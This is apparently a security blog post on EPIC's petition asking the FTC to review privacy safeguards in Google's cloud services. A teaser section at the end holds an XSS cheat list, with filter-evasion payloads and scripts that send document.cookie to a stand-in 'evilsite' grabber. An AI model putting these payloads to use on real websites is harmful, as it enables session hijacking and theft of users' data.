Electronic Privacy Information Center (EPIC) a privacy group based in Washington, D.C filed a petition to Federal trade commission to investigate the Google’s cloud computing offerings. They asked FTC to investigate products including Gmail, Google Docs, Google Calendar and Picasa — to determine “the adequacy of the privacy and security safeguards.”

The group cites various security breaches involving Google products including the one happened few weeks back which shared Google hosted documents to other users without permission. It also cites security breaches in Gmail and Google desktop dating back to 2005. The complaint also cites marketing tactics used by Google which offers complete security of customer’s data and TOS which doesn’t guarantee any.

Previous EPIC complaints have led the Commission to order Microsoft to revise the security standards for Passport and to require Choicepoint to change its business practices and pay $15 m in fines.

Find the complaint here

http://epic.org/privacy/cloudcomputing/google/ftc031709.pdf

Explore More

Social Engineering Fundamentals

A True Story One morning a few years back, a group of strangers walked into a large shipping firm and walked out with access to the firm’s entire corporate network.

Read More

Log Poisoning

Log poisoning is a technique that not many know about. this technique works only if you can make an LFI of the page. if we say that you call index.php,

Read More

XSS Cheat List

<script>alert(1);</script> <script>alert('XSS');</script> <script src="http://www.evilsite.org/cookiegrabber.php"></script> <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee><script>alert('XSS')</script></marquee> <IMG SRC=\"jav&#x09;ascript:alert('XSS');\"> <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\"> <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script>

Read More